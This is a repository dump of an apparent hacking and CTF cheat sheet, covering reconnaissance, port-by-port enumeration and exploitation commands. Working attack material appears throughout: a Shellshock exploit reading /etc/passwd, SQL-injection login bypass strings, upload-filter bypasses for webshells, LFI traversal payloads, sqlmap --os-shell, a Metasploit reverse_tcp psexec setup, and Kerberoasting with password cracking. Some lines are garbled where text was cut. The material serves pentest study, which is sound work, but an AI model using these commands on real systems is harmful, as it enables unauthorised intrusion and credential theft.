├── Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3 ├── Untitled 1.png ├── Untitled 2.png ├── Untitled 3.png ├── Untitled 4.png ├── Untitled 5.png ├── Untitled 6.png ├── Untitled 7.png ├── Untitled Database 2c8912d8c7b747859491d93a41439662.csv ├── Untitled Database 2c8912d8c7b747859491d93a41439662 │ ├── MD5 $PASS $SALT Example 018d56d7f72d4139bb09efae564f41e8.md │ ├── MD5 $SALT $PASS e070dfeb1b1449eda8408d651d8e336b.md │ ├── MD5 Hash Example 4eee9a1c2fbf4826a438decf1d2e0a2c.md │ ├── NTLM Hash Example 61f973fc93c241f1a2ab8ecbcd528aac.md │ ├── SHA-256 $PASS $SALT ad4fae024ccb4e039324d5e964321750.md │ ├── SHA-256 $SALT $PASS e2b56f602f494450ad85a542e20d8be5.md │ ├── SHA-256 2bc6a6c1a79240e29f3f3c6ab906c626.md │ ├── SHA-512 $PASS $SALT 3de8a178f73f4c1c924378152cc95c6d.md │ ├── SHA-512 $SALT $PASS 1288b44530fd4c4581ea4d329180f023.md │ ├── SHA-512 43e0a92aa6e04cfa907c343f796fe318.md │ ├── SHA1 $PASS $SALT c533fcb037e948039b7c04ca7a23d477.md │ ├── SHA1 $SALT $PASS 19f737559ec84f29bfd936e9aa1ba7f2.md │ └── SHA1 Hash Example 3c9b5ac26c894cdebcc96ef55ad216cd.md ├── Untitled.png ├── psexec d818d32588314cb68f8ca3db57a6e1ef.md └── psexec d818d32588314cb68f8ca3db57a6e1ef │ └── Untitled.png ├── Hacking Cheat Sheet.md ├── README.md ├── report.md └── skel.sh /Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/Untitled 1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hasamba/Hacking-and-CTF-Cheat-Sheet/7f6bbe7bd6bfabc074157a52c9dc580aa3d65ac2/Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/Untitled 1.png -------------------------------------------------------------------------------- /Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/Untitled 2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hasamba/Hacking-and-CTF-Cheat-Sheet/7f6bbe7bd6bfabc074157a52c9dc580aa3d65ac2/Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/Untitled 2.png -------------------------------------------------------------------------------- /Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/Untitled 3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hasamba/Hacking-and-CTF-Cheat-Sheet/7f6bbe7bd6bfabc074157a52c9dc580aa3d65ac2/Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/Untitled 3.png -------------------------------------------------------------------------------- /Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/Untitled 4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hasamba/Hacking-and-CTF-Cheat-Sheet/7f6bbe7bd6bfabc074157a52c9dc580aa3d65ac2/Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/Untitled 4.png -------------------------------------------------------------------------------- /Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/Untitled 5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hasamba/Hacking-and-CTF-Cheat-Sheet/7f6bbe7bd6bfabc074157a52c9dc580aa3d65ac2/Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/Untitled 5.png -------------------------------------------------------------------------------- /Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/Untitled 6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hasamba/Hacking-and-CTF-Cheat-Sheet/7f6bbe7bd6bfabc074157a52c9dc580aa3d65ac2/Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/Untitled 6.png -------------------------------------------------------------------------------- /Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/Untitled 7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hasamba/Hacking-and-CTF-Cheat-Sheet/7f6bbe7bd6bfabc074157a52c9dc580aa3d65ac2/Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/Untitled 7.png -------------------------------------------------------------------------------- /Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/Untitled Database 2c8912d8c7b747859491d93a41439662.csv: -------------------------------------------------------------------------------- 1 | Hash,Example 2 | MD5 Hash Example,8743b52063cd84097a65d1633f5c74f5 3 | MD5 $PASS:$SALT Example,01dfae6e5d4d90d9892622325959afbe:7050461 4 | MD5 $SALT:$PASS,f0fda58630310a6dd91a7d8f0a4ceda2:4225637426 5 | SHA1 Hash Example,b89eaac7e61417341b710b727768294d0e6a277b 6 | SHA1 $PASS:$SALT,2fc5a684737ce1bf7b3b239df432416e0dd07357:2014 7 | SHA1 $SALT:$PASS,cac35ec206d868b7d7cb0b55f31d9425b075082b:5363620024 8 | SHA-256,127e6fbfe24a750e72930c220a8e138275656b8e5d8f48a98c3c92df2caba935 9 | SHA-256 $PASS:$SALT,c73d08de890479518ed60cf670d17faa26a4a71f995c1dcc978165399401a6c4 10 | SHA-256 $SALT:$PASS,eb368a2dfd38b405f014118c7d9747fcc97f4f0ee75c05963cd9da6ee65ef498:560407001617 11 | SHA-512,82a9dda829eb7f8ffe9fbe49e45d47d2dad9664fbb7adf72492e3c81ebd3e29134d9bc12212bf83c6840f10e8246b9db54a4859b7ccd0123d86e5872c1e5082f 12 | SHA-512 $PASS:$SALT,e5c3ede3e49fb86592fb03f471c35ba13e8d89b8ab65142c9a8fdafb635fa2223c24e5558fd9313e8995019dcbec1fb584146b7bb12685c7765fc8c0d51379fd 13 | SHA-512 $SALT:$PASS,976b451818634a1e2acba682da3fd6efa72adf8a7a08d7939550c244b237c72c7d42367544e826c0c83fe5c02f97c0373b6b1386cc794bf0d21d2df01bb9c08a 14 | NTLM Hash Example,b4b9b02e6f09a9bd760f388b67351e2b -------------------------------------------------------------------------------- /Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/Untitled Database 2c8912d8c7b747859491d93a41439662/MD5 $PASS $SALT Example 018d56d7f72d4139bb09efae564f41e8.md: -------------------------------------------------------------------------------- 1 | # MD5 $PASS:$SALT Example 2 | 3 | Example: 01dfae6e5d4d90d9892622325959afbe:7050461 -------------------------------------------------------------------------------- /Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/Untitled Database 2c8912d8c7b747859491d93a41439662/MD5 $SALT $PASS e070dfeb1b1449eda8408d651d8e336b.md: -------------------------------------------------------------------------------- 1 | # MD5 $SALT:$PASS 2 | 3 | Example: f0fda58630310a6dd91a7d8f0a4ceda2:4225637426 -------------------------------------------------------------------------------- /Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/Untitled Database 2c8912d8c7b747859491d93a41439662/MD5 Hash Example 4eee9a1c2fbf4826a438decf1d2e0a2c.md: -------------------------------------------------------------------------------- 1 | # MD5 Hash Example 2 | 3 | Example: 8743b52063cd84097a65d1633f5c74f5 -------------------------------------------------------------------------------- /Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/Untitled Database 2c8912d8c7b747859491d93a41439662/NTLM Hash Example 61f973fc93c241f1a2ab8ecbcd528aac.md: -------------------------------------------------------------------------------- 1 | # NTLM Hash Example 2 | 3 | Example: b4b9b02e6f09a9bd760f388b67351e2b -------------------------------------------------------------------------------- /Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/Untitled Database 2c8912d8c7b747859491d93a41439662/SHA-256 $PASS $SALT ad4fae024ccb4e039324d5e964321750.md: -------------------------------------------------------------------------------- 1 | # SHA-256 $PASS:$SALT 2 | 3 | Example: c73d08de890479518ed60cf670d17faa26a4a71f995c1dcc978165399401a6c4 -------------------------------------------------------------------------------- /Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/Untitled Database 2c8912d8c7b747859491d93a41439662/SHA-256 $SALT $PASS e2b56f602f494450ad85a542e20d8be5.md: -------------------------------------------------------------------------------- 1 | # SHA-256 $SALT:$PASS 2 | 3 | Example: eb368a2dfd38b405f014118c7d9747fcc97f4f0ee75c05963cd9da6ee65ef498:560407001617 -------------------------------------------------------------------------------- /Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/Untitled Database 2c8912d8c7b747859491d93a41439662/SHA-256 2bc6a6c1a79240e29f3f3c6ab906c626.md: -------------------------------------------------------------------------------- 1 | # SHA-256 2 | 3 | Example: 127e6fbfe24a750e72930c220a8e138275656b8e5d8f48a98c3c92df2caba935 -------------------------------------------------------------------------------- /Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/Untitled Database 2c8912d8c7b747859491d93a41439662/SHA-512 $PASS $SALT 3de8a178f73f4c1c924378152cc95c6d.md: -------------------------------------------------------------------------------- 1 | # SHA-512 $PASS:$SALT 2 | 3 | Example: e5c3ede3e49fb86592fb03f471c35ba13e8d89b8ab65142c9a8fdafb635fa2223c24e5558fd9313e8995019dcbec1fb584146b7bb12685c7765fc8c0d51379fd -------------------------------------------------------------------------------- /Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/Untitled Database 2c8912d8c7b747859491d93a41439662/SHA-512 $SALT $PASS 1288b44530fd4c4581ea4d329180f023.md: -------------------------------------------------------------------------------- 1 | # SHA-512 $SALT:$PASS 2 | 3 | Example: 976b451818634a1e2acba682da3fd6efa72adf8a7a08d7939550c244b237c72c7d42367544e826c0c83fe5c02f97c0373b6b1386cc794bf0d21d2df01bb9c08a -------------------------------------------------------------------------------- /Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/Untitled Database 2c8912d8c7b747859491d93a41439662/SHA-512 43e0a92aa6e04cfa907c343f796fe318.md: -------------------------------------------------------------------------------- 1 | # SHA-512 2 | 3 | Example: 82a9dda829eb7f8ffe9fbe49e45d47d2dad9664fbb7adf72492e3c81ebd3e29134d9bc12212bf83c6840f10e8246b9db54a4859b7ccd0123d86e5872c1e5082f -------------------------------------------------------------------------------- /Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/Untitled Database 2c8912d8c7b747859491d93a41439662/SHA1 $PASS $SALT c533fcb037e948039b7c04ca7a23d477.md: -------------------------------------------------------------------------------- 1 | # SHA1 $PASS:$SALT 2 | 3 | Example: 2fc5a684737ce1bf7b3b239df432416e0dd07357:2014 -------------------------------------------------------------------------------- /Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/Untitled Database 2c8912d8c7b747859491d93a41439662/SHA1 $SALT $PASS 19f737559ec84f29bfd936e9aa1ba7f2.md: -------------------------------------------------------------------------------- 1 | # SHA1 $SALT:$PASS 2 | 3 | Example: cac35ec206d868b7d7cb0b55f31d9425b075082b:5363620024 -------------------------------------------------------------------------------- /Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/Untitled Database 2c8912d8c7b747859491d93a41439662/SHA1 Hash Example 3c9b5ac26c894cdebcc96ef55ad216cd.md: -------------------------------------------------------------------------------- 1 | # SHA1 Hash Example 2 | 3 | Example: b89eaac7e61417341b710b727768294d0e6a277b -------------------------------------------------------------------------------- /Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/Untitled.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hasamba/Hacking-and-CTF-Cheat-Sheet/7f6bbe7bd6bfabc074157a52c9dc580aa3d65ac2/Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/Untitled.png -------------------------------------------------------------------------------- /Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/psexec d818d32588314cb68f8ca3db57a6e1ef.md: -------------------------------------------------------------------------------- 1 | # psexec 2 | 3 | - msfconsole: 4 | - search psexec 5 | - options: 6 | - set rhost/domain/smbuser/smbpassword 7 | - set payload windows/x64/neterpeter/reverse_tcp 8 | - set lhost eth0 9 | - run 10 | - pxexec through meterpeter doesnt always work, we can try psexec.py 11 | - 12 | 13 | ![psexec%20d818d32588314cb68f8ca3db57a6e1ef/Untitled.png](psexec%20d818d32588314cb68f8ca3db57a6e1ef/Untitled.png) 14 | 15 | - we can also try wmiexec.py or smbexec.py -------------------------------------------------------------------------------- /Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/psexec d818d32588314cb68f8ca3db57a6e1ef/Untitled.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hasamba/Hacking-and-CTF-Cheat-Sheet/7f6bbe7bd6bfabc074157a52c9dc580aa3d65ac2/Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/psexec d818d32588314cb68f8ca3db57a6e1ef/Untitled.png -------------------------------------------------------------------------------- /Hacking Cheat Sheet.md: -------------------------------------------------------------------------------- 1 | # Hacking Cheat Sheet 2 | 3 | # Reconnaissance (Information Gathering) 4 | 5 | - [hunter.io](https://hunter.io/) - known email and users for a specific domain 6 | - theharvester - search for emails in several search engines 7 | 8 | ```bash 9 | theHarvester -d *.co.il -l 500 -b google 10 | ``` 11 | 12 | - sublist3r - search for subdomain for a given domain 13 | - [crt.sh](http://crt.sh) - subdomains search with %.tesla.co.il 14 | - [httprobe](https://github.com/tomnomnom/httprobe) - will check a list of domain if they are alive, we can fire it sublis3r results 15 | - [amass](https://github.com/OWASP/Amass) - can also search for subdomains and more 16 | 17 | ```bash 18 | amass enum -d tesla.com 19 | ``` 20 | 21 | - [builtwith](https://builtwith.com/) - show frameworks and technologies any domain is built with, then we can search for exploits for those technologies 22 | - [wappalizer](https://www.wappalyzer.com/download/) - browser addon that does almost the same as builtwith 23 | - whatweb - same but uglier than builtwith 24 | - [sumrecon](https://github.com/Gr1mmie/sumrecon) - script that automate some of the above 25 | - [shodan.io](http://shodan.io) - find open ports and services online 26 | - [dnsdumpster](https://dnsdumpster.com/) - dns recon & research, find & lookup dns records 27 | - [ipinfo.io](http://ipinfo.io) - ip info 28 | - [dehashed](https://www.dehashed.com) - find leaked emails and passwords 29 | - simplyemail - enumerate all the online places (github, target site etc) 30 | 31 | ``` 32 | git clone https://github.com/killswitch-GUI/SimplyEmail.git 33 | ./SimplyEmail.py -all -e TARGET-DOMAIN 34 | ``` 35 | 36 | - DNSRecon - DNS Bruteforce 37 | 38 | ```bash 39 | dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml 40 | ``` 41 | 42 | - Skipfish - prepares an interactive sitemap for the targeted site 43 | 44 | ```bash 45 | # basic scan 46 | skipfish -o out_dir https://www.host.com 47 | # using cookies to access authenticated pages 48 | skipfish -o out_dir -I urls_to_scan -X urls_not_to_scan -C cookie1=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX -C cookie2=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX https://www.host.com 49 | ``` 50 | 51 | - [namechk](https://namechk.com/) / [whatsmyname](https://whatsmyname.app/) / [namecheckup](https://namecheckup.com/) - OSINT use accounts around the web 52 | - [maltego](https://sectools.org/tool/maltego/) - data mining application 53 | 54 | - Exploiting Shellshock 55 | 56 | ```bash 57 | git clone https://github.com/nccgroup/shocker 58 | ``` 59 | 60 | ```bash 61 | ./shocker.py -H TARGET --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose 62 | ``` 63 | 64 | cat file (view file contents) 65 | 66 | ```bash 67 | echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo \$( 154 | ./nmapAutomator.sh 10.1.1.1 All 155 | ./nmapAutomator.sh 10.1.1.1 Basic 156 | ./nmapAutomator.sh 10.1.1.1 Recon 157 | ``` 158 | 159 | - [autorecon](https://github.com/Tib3rius/AutoRecon) - multi-threaded network reconnaissance tool which performs automated enumeration of services 160 | 161 | ```bash 162 | autorecon 127.0.0.1 163 | 164 | ``` 165 | 166 | - [Vanquish](https://github.com/frizb/Vanquish) - AIO tool (NMap | Hydra | Nikto | Metasploit | | Gobuster | Dirb | Exploitdb | Nbtscan | | Ntpq | Enum4linux | Smbclient | Rpcclient | | Onesixtyone | Sslscan | Sslyze | Snmpwalk | | Ident-user-enum | Smtp-user-enum | Snmp-check | Cisco-torch | | Dnsrecon | Dig | Whatweb | Wafw00f | | Wpscan | Cewl | Curl | Mysql | Nmblookup | Searchsploit | | Nbtscan-unixwiz | Xprobe2 | Blindelephant | Showmount) 167 | 168 | ```bash 169 | echo "[IP]" > ~/tools/vanquish/hosts.txt 170 | python2 Vanquish2.py -hostFile hosts.txt -logging -outputFolder ~/hackthebox/[BOXNAME] 171 | 172 | ``` 173 | 174 | - [hackerEnv](https://github.com/abdulr7mann/hackerEnv) - automation tool that quickly and easily sweep IPs and scan ports, vulnerabilities and exploit them 175 | 176 | ```bash 177 | ./hackerEnv -t 10.10.10.10 178 | ``` 179 | 180 | - [fsociety](https://github.com/Manisso/fsociety) - A Penetration Testing Framework, you will have every script that a hacker needs 181 | 182 | - recon-ag - full-featured web reconnaissance framework written in Python 183 | 184 | ```bash 185 | git clone https://github.com/lanmaster53/recon-ng.gitcd /recon-ng 186 | ./recon-ng 187 | show modules 188 | help 189 | ``` 190 | 191 | - [autorecon](https://github.com/Tib3rius/AutoRecon) - multi-threaded network reconnaissance tool which performs automated enumeration of services 192 | 193 | ```bash 194 | autorecon 127.0.0.1 195 | ``` 196 | 197 | - [legion](https://github.com/carlospolop/legion) - Automatic Enumeration Tool 198 | 199 | ```jsx 200 | sudo ~/tools/legion/legion.py 201 | options 202 | set host 10.0.0.210 203 | run 204 | ``` 205 | 206 | # Enumeration Open Ports 207 | 208 | [Pentesting Network](https://book.hacktricks.xyz/pentesting/pentesting-network) 209 | 210 | ## FTP Enumeration (21) 211 | 212 | ```bash 213 | nmap –script ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 10.0.0.1 214 | FTP anonymous sign in 215 | mget * #download everything 216 | 217 | #can we upload file as anonymous? 218 | #if so we can try upload a cmd webshell and execute commands 219 | locate cmd.aspx #if iis 220 | put cmd.aspx 221 | #browse to the file: 222 | http://IP/cmd.aspx 223 | 224 | #we can also try to create a shell payload with msfvenum and upload it 225 | ``` 226 | 227 | ## **SSH (22):** 228 | 229 | ```bash 230 | ssh INSERTIPADDRESS 22 231 | 232 | nc IP 22 233 | 234 | nmap -p 22 --script ssh-brute --script-args userdb=users.lst,passdb=pass.lst --script-args ssh-brute.timeout=4s 235 | 236 | #downloading 237 | scp username@hostname:/path/to/remote/file /path/to/local/file 238 | ``` 239 | 240 | If NMAP show "SSH Filtered" it means that [port knocking](https://blog.rapid7.com/2017/10/04/how-to-secure-ssh-server-using-port-knocking-on-ubuntu-linux/) is enable 241 | 242 | ```bash 243 | #we need to find the /etc/knockd.conf (thorough LFI or FTP or something else) 244 | #inside there is a sequence 245 | knock IP SEQUENCE1 SEQUENCE2 SEQUENCE3 246 | #check nmap again 247 | ``` 248 | 249 | ## **SMTP Enumeration (25):** 250 | 251 | ```bash 252 | nmap --script smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 10.0.0.1 253 | ``` 254 | 255 | ```bash 256 | nc -nvv INSERTIPADDRESS 25 257 | ``` 258 | 259 | ```bash 260 | telnet INSERTIPADDRESS 25 261 | ``` 262 | 263 | ```jsx 264 | use auxiliary/scanner/smtp/smtp_enum 265 | msf auxiliary(smtp_enum) > set rhosts 192.168.1.107 266 | msf auxiliary(smtp_enum) > set rport 25 267 | msf auxiliary(smtp_enum) > set USER_FILE /root/Desktop/user.txt 268 | msf auxiliary(smtp_enum) > exploitw 269 | ``` 270 | 271 | ## DNS (53) 272 | 273 | ```bash 274 | #DNS zone transfer 275 | sudo nano /etc/hosts 276 | 10.10.10.123 friendzone.red 277 | host -l friendzone.red 10.10.10.123 278 | ``` 279 | 280 | ## **Finger Enumeration (79):** 281 | 282 | Download script and run it with a wordlist: [http://pentestmonkey.net/tools/user-enumeration/finger-user-enum](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum) 283 | 284 | ```bash 285 | finger-user-enum.pl [options] (-u username|-U users.txt) (-t host|-T ips.txt)( 286 | ``` 287 | 288 | ## **Web Enumeration (80/443):** 289 | 290 | [extra enumeration from hacktricks](https://book.hacktricks.xyz/pentesting/pentesting-web) 291 | 292 | if we get default apache page, try entering IP to HOSTS 293 | 294 | Before dirbusting, try going to index.php or index.html to know which extention to look for 295 | 296 | ```bash 297 | dirbuster (GUI) 298 | #1st try without "be recursive" 299 | ``` 300 | 301 | ```powershell 302 | cd ~/tools 303 | ./feroxbuster -u URL -w WORDLIST -x EXT -C 403 -t 100 304 | ``` 305 | 306 | ```bash 307 | Web Extensions 308 | 309 | sh,txt,php,html,htm,asp,aspx,js,xml,log,json,jpg,jpeg,png,gif,doc,pdf,mpg,mp3,zip,tar.gz,tar 310 | ``` 311 | 312 | ```bash 313 | dirb http://target.com /path/to/wordlist 314 | dirb http://target.com /path/to/wordlist -X .sh,.txt,.htm,.php,.cgi,.html,.pl,.bak,.old 315 | ``` 316 | 317 | ```bash 318 | gobuster dir -u https://target.com -b 403 ms-w /usr/share/wordlists/dirb/big.txt -x .txt,.php 319 | use -r (recursive) or try found folders 320 | ``` 321 | 322 | ```bash 323 | nikto –h 10.0.0.1 #web vulnerability scanner 324 | ``` 325 | 326 | ```jsx 327 | owasp zap 328 | ``` 329 | 330 | ```bash 331 | Look for Default Credentials 332 | ``` 333 | 334 | ```bash 335 | sql 336 | ``` 337 | 338 | - View Page Source 339 | 340 | ```bash 341 | Hidden Values 342 | Developer Remarks 343 | Extraneous Code 344 | Passwords! 345 | ``` 346 | 347 | - burpsuite 348 | 349 | ```bash 350 | compare “host:” 351 | crsf token = no bruteforce 352 | add php code if url has anything.php 353 | 354 | anything being executed? 355 | try directory traversal 356 | ../../../home 357 | ``` 358 | 359 | - sign in page 360 | 361 | ```bash 362 | SQL Injection 363 | 364 | ‘or 1=1– – 365 | ‘ or ‘1’=1 366 | ‘ or ‘1’=1 — – 367 | ‘– 368 | Use known Username 369 | tyler’ — – 370 | tyler’) — – 371 | 372 | #bruteforce 373 | hydra -L -p
374 | ``` 375 | 376 | - file upload 377 | 378 | ```bash 379 | 380 | #if NMAP show something like: Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND 381 | #we want to check if we can upload files 382 | davtest -url http://IP 383 | #if we see succedd we can use curl to upload: 384 | curl -X PUT http://10.10.10.15/df.txt -d @test.txt 385 | #and execute it: 386 | **curl http://10.10.10.15/df.txt** 387 | 388 | Blacklisting bypass 389 | bypassed by uploading an unpopular php extensions. such as: pht, phpt, phtml, php3, php4, php5, php6 390 | Whitelisting bypass 391 | passed by uploading a file with some type of tricks, Like adding a null byte injection like ( shell.php%00.gif ). Or by using double extensions for the uploaded file like ( shell.jpg.php) 392 | ``` 393 | 394 | - Wfuzz - Subdomain brute forcer, replaces a part of the url like username with wordlist 395 | 396 | ```bash 397 | wfuzz -c -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?FUZZ=test 398 | 399 | wfuzz -c --hw 114 -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?page=FUZZ 400 | 401 | wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt "$ip:60080/?page=mailer&mail=FUZZ" 402 | 403 | wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt --hc 404 $ip/FUZZ 404 | 405 | wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt -R 3 --sc 200 $ip/FUZZ 406 | ``` 407 | 408 | - [Knockpy](https://github.com/guelfoweb/knock) - enumerate subdomains on a target domain through a wordlist 409 | 410 | ```bash 411 | knockpy domain.com 412 | ``` 413 | 414 | - wpscan - if wordpress found 415 | 416 | ```bash 417 | wpscan --url [http://:80$target](http://:80$target) --enumerate u,t,p | tee $target-wpscan-enum 418 | #if we can enter wordpres, we can change the 404 page to php reverse shell code and gain access 419 | ``` 420 | 421 | - joomscan - if joomla found 422 | 423 | ```powershell 424 | 425 | cd ~/tools/joomscan 426 | perl joomscan.pl -u http://10.10.10.150/administrator/ 427 | ``` 428 | 429 | ## If A File is found 430 | 431 | - steghide - check pictures for hidden files 432 | 433 | ```bash 434 | apt-get install steghide 435 | 436 | steghide extract -sf picture.jpg 437 | 438 | steghide info picture.jpg 439 | 440 | apt-get install stegosuite 441 | ``` 442 | 443 | - [Stegseek](https://github.com/RickdeJager/stegseek) - lightning fast steghide cracker to extract hidden data from files 444 | 445 | ```bash 446 | stegseek [stegofile.jpg] [wordlist.txt] 447 | ``` 448 | 449 | - binwalk - extract hidden files from files (steganography) 450 | 451 | ```bash 452 | binwalk FILE.JPG 453 | #if something was found 454 | binwalk -e FILE 455 | ``` 456 | 457 | - strings - check strings in files 458 | 459 | ```bash 460 | stringe FILE.jpg 461 | ``` 462 | 463 | - [exiftool](https://github.com/exiftool/exiftool) - pictures metadata 464 | - zip2john - prepare an encrpyted zip file for john hacking 465 | 466 | ```bash 467 | zip2john ZIPFILE > zip.hashs 468 | ``` 469 | 470 | - SQLite DB 471 | 472 | ```powershell 473 | #if we found a flat-file db 474 | file EXAMPLE.db 475 | #if sqlite3 476 | sqlite3 477 | .tables 478 | PRAGMA table_info(customers); 479 | SELECT * FROM customers; 480 | ``` 481 | 482 | - sqlmap - check website for sql injection (more info down) 483 | 484 | [Sqlmap trick](https://hackertarget.com/sqlmap-post-request-injection/) - if we have a login page, we can try admin:admin, catch that in burpsuite, save the full request to a file, run: 485 | 486 | ```bash 487 | sqlmap -r FILENAME --level=5 --risk=3 --batch 488 | sqlmap -r FILENAME -dbs --level=5 --risk=3 --batch 489 | 490 | sqlmap -r FILENAME --dbs #enumarate DB's 491 | sqlmap -r FILENAME -D DB_Name --tables #enumarate tables 492 | sqlmap -r FILENAME -D DB_Name -T TABLE_Name --dump #DUMP table 493 | 494 | #Find SQL in webpage url automatically 495 | sqlmap -u https://IP/ –crawl=1 496 | 497 | #with authentication 498 | sqlmap -u “http://target_server” -s-data=param1=value1¶m2=value2 -p param1--auth-type=basic --auth-cred=username:password 499 | 500 | #Get A Reverse Shell (MySQL) 501 | sqlmap -r post_request.txt --dbms "mysql" --os-shell 502 | ``` 503 | 504 | - [fimap](https://github.com/kurobeats/fimap) - Check for LFI, find, prepare, audit, exploit and even google automatically for local and remote file inclusion 505 | 506 | ```bash 507 | ~/tools/fimap/src/fimap.py –H –u http://target-site.com/ -w output.txt 508 | ``` 509 | 510 | If we see in burpsuite php$url= we need to test for LFI (try /etc/passwrd) 511 | 512 | ```bash 513 | http://$ip/index.php?page=/etc/passwd 514 | http://$ip/index.php?file=../../../../etc/passwd 515 | ``` 516 | 517 | ## if a page redirects to another, we can use burp to stop 518 | 519 | ```bash 520 | Proxy -> Options -> Match and Replace 521 | ``` 522 | 523 | ![Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled.png](Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled.png) 524 | 525 | ![Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%201.png](Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%201.png) 526 | 527 | ## kerberos (88): 528 | 529 | ```powershell 530 | tel#add host to /etc/hosts 531 | sudo gedit /etc/hosts 532 | 533 | ./GetUserSPNs.py -request active.htb/SVC_TGS > admin.txt 534 | #the password we will get will be encrypted 535 | john admin.txt --wordlist=/usr/share/wordlists/rockyou.txt 536 | 537 | #with the cracked password... 538 | psexec.py administrator@active.htb 539 | ``` 540 | 541 | ## **Pop3 (110):** 542 | 543 | ```bash 544 | telnet INSERTIPADDRESS 110 545 | ``` 546 | 547 | ```bash 548 | USER [username] 549 | ``` 550 | 551 | ```bash 552 | PASS [password] 553 | ``` 554 | 555 | - To login 556 | 557 | ```bash 558 | LIST 559 | ``` 560 | 561 | - To list messages 562 | 563 | ```bash 564 | RETR [message number] 565 | ``` 566 | 567 | - Retrieve message 568 | 569 | ```bash 570 | QUIT 571 | ``` 572 | 573 | ```bash 574 | quits 575 | ``` 576 | 577 | ## RPC (135) 578 | 579 | ```bash 580 | rpcclient --user="" --command=enumprivs -N $ip #Connect to an RPC share without a username and password and enumerate privledges 581 | rpcclient --user="" --command=enumprivs $ip #Connect to an RPC share with a username and enumerate privledges 582 | ``` 583 | 584 | ## **RPCBind (111):** 585 | 586 | ```bash 587 | rpcinfo –p x.x.x.x 588 | ``` 589 | 590 | ## **SMB\RPC Enumeration (139/445):** 591 | 592 | ```bash 593 | smbmap -H 10.10.10.149 594 | ``` 595 | 596 | ```bash 597 | smbclient -L \\\\10.0.0.100\\ 598 | smbclient \\\\10.0.0.100\\Replication 599 | prompt off #doesnt prompt of us downloading 600 | recurse on` #download all the files 601 | mget *` #download all files in this share 602 | 603 | ``` 604 | 605 | ```bash 606 | enum4linux -a 10.0.0.1 #Do Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing 607 | ``` 608 | 609 | ```bash 610 | nbtscan x.x.x.x #Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain 611 | ``` 612 | 613 | ```bash 614 | ridenum.py 192.168.XXX.XXX 500 50000 dict.txt 615 | ``` 616 | 617 | ```bash 618 | python /home/hasamba/tools/impacket/build/scripts-3.8/samrdump.py 192.168.XXX.XXX 619 | ``` 620 | 621 | ```bash 622 | nmap --script 